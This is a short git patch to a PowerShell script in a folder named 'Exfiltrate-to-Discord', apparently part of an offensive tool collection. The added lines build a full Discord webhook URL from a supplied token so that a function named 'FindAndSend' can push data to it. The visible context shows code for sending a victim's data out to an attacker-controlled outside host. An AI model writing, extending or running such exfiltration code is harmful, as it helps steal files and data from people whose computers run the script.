From e9877f3e74d1da5602836ae4e4def7c55bd7efcb Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 19 Jun 2025 16:48:41 +0000 Subject: [PATCH] Update main.ps1 --- Exfiltrate-to-Discord/main.ps1 | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Exfiltrate-to-Discord/main.ps1 b/Exfiltrate-to-Discord/main.ps1 index 1136288..b184a7f 100644 --- a/Exfiltrate-to-Discord/main.ps1 +++ b/Exfiltrate-to-Discord/main.ps1 @@ -31,6 +31,9 @@ Nimble – Quick and light in movement or action. #> $hookurl = "$dc" +if ($hookurl.Length -lt 120){ + $hookurl = ("https://discord.com/api/webhooks/" + "$dc") +} Function FindAndSend {